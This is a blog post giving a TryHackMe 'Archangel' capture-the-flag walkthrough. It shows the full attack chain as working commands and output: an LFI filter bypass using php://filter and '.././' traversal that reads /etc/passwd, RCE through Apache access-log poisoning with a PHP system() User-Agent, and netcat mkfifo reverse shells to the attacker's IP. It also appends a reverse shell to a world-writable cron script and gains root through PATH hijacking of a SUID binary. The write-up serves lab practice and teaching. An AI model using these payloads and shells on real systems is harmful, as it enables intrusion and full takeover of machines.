<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/"><b>>thm/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/archangel/"><b>>archangel/</b></a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/hackernote/">hackernote/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass/">overpass/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass2_hacked/">overpass2 hacked/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass3_hosting/">overpass3 hosting/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/the_great_escape/">the great escape/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/wreath/">wreath/</a></li>
			</ul>
		</li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Initial Information</h1>
<blockquote><p><strong>Name:</strong> Archangel; <strong>Box name:</strong> ARcHanG3l; <strong>IP:</strong> 10.10.239.233</p>
</blockquote>
<blockquote><p><strong>Description:</strong> Boot2root, Web exploitation, Privilege escalation, LFI</p>
</blockquote>
<blockquote><p>room link: <a href="https://tryhackme.com/room/archangel">tryhackme.com/room/archangel</a>
by: <a href="https://tryhackme.com/p/Archangel">Archangel</a></p>
</blockquote>
<h1>Enumeration</h1>
<p>As always, we can start with an nmap scan to discover open ports and services running on the box.</p>
<pre><code>$ nmap -sC -sV -p- -oN scans/tcpfull 10.10.239.233
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<ul>
<li>There is only ssh and http open</li>
</ul>
<h2>http - 80/tcp</h2>
<p>We can open the ip in our browser and we can see an email address on the page:</p>
<pre><code>support@mXXXXXXXe.thm
</code></pre>
<p>Since it contains a domain related to the box (<code>.thm</code>) we should add it to <code>/etc/hosts</code>.</p>
<pre><code>10.10.239.233 mXXXXXXXe.thm
</code></pre>
<p>And now we can access the domain.</p>
<pre><code>$ curl http://mXXXXXXXe.thm/
&lt;h1&gt;UNDER DEVELOPMENT&lt;/h1&gt;
thm{fXXXXXXXXXXXXXXXXXXXXXXX3}
</code></pre>
<ul>
<li>We got the first flag!</li>
</ul>
<p>Now, what we can do? We have a test website on the ip and one website under development on the domain.
We can try basic directory fuzzing or just try the most common interesting locations by hand.</p>
<pre><code>$ curl http://mXXXXXXXe.thm/robots.txt
User-agent: *
Disallow: /tXXX.php
</code></pre>
<p>From the <code>/robots.txt</code> file we got a new location <code>/tXXX.php</code>!
Let's try to access it!</p>
<pre><code>$ curl http://mXXXXXXXe.thm/tXXX.php
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
            &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<h3>Testing for LFI</h3>
<p>Here's a link on the page which uses <code>/tXXX.php</code> and the <code>view</code> GET parameter to access a file on the server <code>/var/www/html/development_testing/mrrobot.php</code>.<br />
This functionality can lead to <strong>PATH TRAVERSAL</strong> on a webpage!
So let's start tinkering with it!</p>
<pre><code>$ curl http://mXXXXXXXe.thm/tXXX.php?view=/var/www/html/development_testing/mrrobot.php
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
        Control is an illusion    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>This is a different page than the one I saw before (1 line added)</li>
</ul>
<h3>Struggling with the filtering</h3>
<p>We can try to test for some basic LFI but there are some filtering going on in the background so we cant use <code>/tXXX.php?view=/etc/passwd</code> because we must include the full path <code>/var/www/html/development_testing/</code>. And there are also a filter for multiple <code>../</code>'s.</p>
<p>After some tryings we can figure out
<code>/tXXX.php?view=/var/www/html/development_testing/../development_testing/mrrobot.php</code>
returns the same <code>mrrobot.php</code> page which indicates there is an LFI!
And there is a filter so <strong>WE MUST BYPASS IT</strong> somehow!</p>
<h1>Exploitation</h1>
<p><strong>The PLAN:</strong><br />
Our goal is to <strong>poison the logfile with a malicious User-Agent</strong>
and then <em>access</em> this logfile <em>to execute</em> our payload that was sent to the server
and <em>stored</em> in this logfile.</p>
<p>More reading on RCE via LFI and Log Poisoning: </p>
<ul>
<li><a href="https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/">hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/</a></li>
<li><a href="https://shahjerry33.medium.com/rce-via-lfi-log-poisoning-the-death-potion-c0831cebc16d">shahjerry33.medium.com/rce-via-lfi-log-poisoning-the-death-potion-c0831cebc16d</a></li>
</ul>
<p>We need a logfile we can access then do the rest written in the blog posts above.</p>
<h2>Bypassing LFI filters</h2>
<p>But we need to bypass the filters to exploit this LFI.
We can search for some basic LFI bypass techniques and we will eventually find
one which uses php's <code>php://filter</code>.</p>
<ul>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#wrapper-phpfilter">github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#wrapper-phpfilter</a></li>
<li><a href="https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/">idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/</a></li>
</ul>
<pre><code>http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
</code></pre>
<p>Now, we must customize this payload to our needs.</p>
<pre><code>http://mXXXXXXXe.thm/tXXX.php?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php
</code></pre>
<p>After making a curl request we can immediately see the base64 encoded text on the page which is the source of <code>mrrobot.php</code>!</p>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php'
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
        PD9waHAgZWNobyAnQ29udHJvbCBpcyBhbiBpbGx1c2lvbic7ID8+Cg==    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>We can use <code>base64 -d</code> to decode this text.</p>
<pre><code>$ echo 'PD9waHAgZWNobyAnQ29udHJvbCBpcyBhbiBpbGx1c2lvbic7ID8+Cg==' | base64 -d
&lt;?php echo 'Control is an illusion'; ?&gt;
</code></pre>
<h3>Reading page source</h3>
<p>Requesting <code>tXXX.php</code> with this technique results in a much larger base64 textblock.</p>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/read=convert.base64-encode/resource=/var/www/html/development_testing/tXXX.php'
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
        CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>We can use <code>base64 -d</code> again for decoding.</p>
<pre><code>$ echo 'CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==' | base64 -d
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
        &lt;?php

	    //FLAG: thm{eXXXXXXXXXXXX1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    if(isset($_GET[&quot;view&quot;])){
	    if(!containsStr($_GET['view'], '../..') &amp;&amp; containsStr($_GET['view'], '/var/www/html/development_testing')) {
            	include $_GET['view'];
            }else{

		echo 'Sorry, Thats not allowed';
            }
	}
        ?&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>We got a new flag but there is a more interesting thing than this in the source.
We finally know how the filter works!</p>
<h3>Actually bypassing the filters found in source</h3>
<pre><code>if(!containsStr($_GET['view'], '../..') &amp;&amp; containsStr($_GET['view'], '/var/www/html/development_testing')) {
</code></pre>
<ul>
<li><code>&amp;&amp;</code> means both part of the filter should pass to get our file</li>
<li>If there is a <code>../..</code> string in the <code>view</code> parameter it will <strong><em>FAIL</em></strong></li>
<li>If there is no <code>/var/www/html/development_testing</code> string in the <code>view</code> parameter it will <strong><em>FAIL</em></strong></li>
</ul>
<p>We must construct a payload that bypasses the <code>../..</code> check and passes the path check!
We can actually bypass this restriction by simply adding <code>./</code> in between two <code>../</code>'s.</p>
<p>We must try to get the contents of <code>/etc/passwd</code> to prove our bypass works.</p>
<pre><code>http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../etc/passwd'
</code></pre>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../etc/passwd'

&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;
    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>Note that we didn't use base64 encoding here <em>because it's not a php file which gets executed</em> without encoding</li>
</ul>
<h2>Log poisoning</h2>
<p>We have to get the contents of a logfile where we can insert malicious data.
This file is usually <strong>apache</strong>'s <code>error.log</code> or <code>access.log</code>.</p>
<h3>Finding the correct path</h3>
<p>We can make a quick search for the location of these files (<code>apache access.log location</code>).</p>
<ul>
<li><a href="https://unix.stackexchange.com/questions/38978/where-are-apache-file-access-logs-stored">unix.stackexchange.com/questions/38978/where-are-apache-file-access-logs-stored</a></li>
</ul>
<p>We have the possible locations!</p>
<ul>
<li><code>/var/log/apache/access.log</code></li>
<li><code>/var/log/apache2/access.log</code></li>
<li><code>/var/log/httpd/access.log</code></li>
<li><code>/var/log/httpd/access_log</code></li>
<li><code>/var/log/httpd-access.log</code></li>
</ul>
<p>There are some configfiles too which can leak the location of our target logfile:</p>
<ul>
<li><code>/etc/apache2/apache2.conf</code></li>
<li><code>/etc/httpd/conf/httpd.conf</code></li>
</ul>
<pre><code>/etc/apache2/apache2.conf:
$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../etc/apache2/apache2.conf'
ErrorLog ${APACHE_LOG_DIR}/error.log

/etc/apache2/envvars:
$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../etc/apache2/envvars'
export APACHE_LOG_DIR=/var/log/apache2$SUFFIX
</code></pre>
<p>Since we have the path we can try to get the logfile's contents.</p>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log'
</code></pre>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=php://filter/resource=/var/www/html/development_testing/.././.././.././../var/log/apache2/access.log' | head -n 15
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;

&lt;head&gt;
    &lt;title&gt;INCLUDE&lt;/title&gt;
    &lt;h1&gt;Test Page. Not to be Deployed&lt;/h1&gt;

    &lt;/button&gt;&lt;/a&gt; &lt;a href=&quot;/tXXX.php?view=/var/www/html/development_testing/mrrobot.php&quot;&gt;&lt;button id=&quot;secret&quot;&gt;Here is a button&lt;/button&gt;&lt;/a&gt;&lt;br&gt;

10.8.2.82 - - [06/Feb/2021:18:05:26 +0530] &quot;GET / HTTP/1.0&quot; 200 19462 &quot;-&quot; &quot;-&quot;
10.8.2.82 - - [06/Feb/2021:18:05:27 +0530] &quot;GET / HTTP/1.1&quot; 200 19462 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&quot;
10.8.2.82 - - [06/Feb/2021:18:05:27 +0530] &quot;PROPFIND / HTTP/1.1&quot; 405 523 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&quot;
10.8.2.82 - - [06/Feb/2021:18:05:27 +0530] &quot;PROPFIND / HTTP/1.1&quot; 405 523 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&quot;
10.8.2.82 - - [06/Feb/2021:18:05:27 +0530] &quot;GET /.git/HEAD HTTP/1.1&quot; 404 455 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&quot;
</code></pre>
<p>We got the contents of the <code>access.log</code> file which contains <strong>User-Agent</strong>s too!
This part of the file is what we want to use to get an RCE on the box.</p>
<h3>Tesing RCE</h3>
<p>Now, make a request to the page with a malicious user agent and then request this file again!</p>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log' -H &quot;User-Agent: asd &lt;?php system('id'); ?&gt; fgh&quot;
</code></pre>
<p>For the second request our command should be eexecuted.</p>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log' -H &quot;User-Agent: asd &lt;?php system('id'); ?&gt; fgh&quot;
---[SNIP]---
10.8.2.82 - - [06/Feb/2021:20:03:23 +0530] &quot;GET /tXXX.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1&quot; 200 2942 &quot;-&quot; &quot;asd uid=33(www-data) gid=33(www-data) groups=33(www-data)
 fgh&quot;
---[SNIP]---
</code></pre>
<ul>
<li>Yes! We got RCE via lfi and log poisoning!</li>
</ul>
<p>Now, it's time to pop a reverse shell and get to the box.</p>
<h3>Getting a reverse shell</h3>
<pre><code>$ curl 'http://mXXXXXXXe.thm/tXXX.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log' -H &quot;User-Agent: asd &lt;?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.8.2.82 1337 &gt;/tmp/f'); ?&gt; fgh&quot;

</code></pre>
<ul>
<li>Our shell hangs and we got a reverse shell connection as <code>www-data</code>!</li>
</ul>
<p><strong><em>We made use of an LFI vulnerability then we chained it with Log poisoning
in order to get an RCE!</em></strong></p>
<pre><code>cat /home/archangel/user.txt
thm{lXXXXXXXXXXXXXXXXXXy}
</code></pre>
<h1>Privilege Escalation from www-data</h1>
<p>I ran <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh">linpeas.sh</a> in order to scan the box for possible privesc vectors.</p>
<pre><code>*/1 *   * * *   archangel /opt/helloworld.sh
</code></pre>
<p>I took a closer look on <code>/etc/crontab</code> and the file that gets executed regularly.</p>
<pre><code>$ cat /etc/crontab
---[SNIP]---
# m h dom mon dow user  command
*/1 *   * * *   archangel /opt/helloworld.sh
---[SNIP]---

$ ls -la /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 /opt/helloworld.sh

$ cat /opt/helloworld.sh
#!/bin/bash
echo &quot;hello world&quot; &gt;&gt; /opt/backupfiles/helloworld.txt
</code></pre>
<p>The file has <code>777</code>(rwxrwxrwx) permission which is very dangerous and it can be used for privilege escalation!
We can overwrite the file with our commands and it will be executed as user <code>archangel</code>.</p>
<p><strong>The PLAN:</strong>
<ol start="0">
<li>Start a listener</li>
<li>Add our revshell payload to the file</li>
<li>Wait until it runs</li>
<li>Enjoy lurking on the box as <code>archangel</code></li>
</ol>
</p>
<p><strong>target</strong>:</p>
<pre><code>$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.8.2.82 1338 &gt;/tmp/f' &gt;&gt; /opt/helloworld.sh
</code></pre>
<p><strong>attacker</strong>:</p>
<pre><code>$ nc -lvnp 1338
connect to [10.8.2.82] from (UNKNOWN) [10.10.136.215] 33250
/bin/sh: 0: can't access tty; job control turned off
id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
</code></pre>
<p><strong><em>We made use of bad permissions to get a higher privileged shell!</em></strong></p>
<pre><code>cat /home/archangel/secret/user2.txt
thm{hXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXn}
</code></pre>
<h1>Privilege Escalation from archangel</h1>
<p>I ran <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh">linpeas.sh</a> again.</p>
<p>Linpeas found a SUID binary which can be interesting so we should take a look at it.</p>
<pre><code>-rwsr-xr-x 1 root root 16904 Nov 18 16:40 /home/archangel/secret/backup
</code></pre>
<h2>Analysing the binary</h2>
<pre><code>$ file backup
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped
</code></pre>
<pre><code>$ strings backup
---[SNIP]---
cp /home/user/archangel/myfiles/* /opt/backupfiles
---[SNIP]---
</code></pre>
<p>This binary uses relative paths instead of absolute paths.
This makes <strong>path injection</strong> possible and this can be a way to get root on the system!</p>
<h2>Path injection</h2>
<p><strong>The PLAN:</strong>
<ol>
<li>Make a file called <code>cp</code> in a new directory and fill it with <code>bash -p</code></li>
<li>Make this file executable --&gt; <code>chmod +x cp</code></li>
<li>Add the new directory to the beginning of <code>$PATH</code> --&gt; <code>export PATH=&quot;/dev/shm/random123/:$PATH&quot;</code></li>
<li>Execute the SUID binary --&gt; <code>/home/archangel/secret/backup</code></li>
</ol>
</p>
<pre><code>$ cd /dev/shm
$ mkdir random123
$ cd random123
$ echo 'bash -p' &gt; cp
$ chmod +x ./cp
$ export PATH=&quot;/dev/shm/random123/:$PATH&quot;
$ /home/archangel/secret/backup
# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
</code></pre>
<p><strong><em>We made use of a SUID binary which used relative paths instead of absolute paths which made the binary vulnerable to path injection!</em></strong></p>
<pre><code>cat /root/root.txt
thm{pXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXn}
</code></pre>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
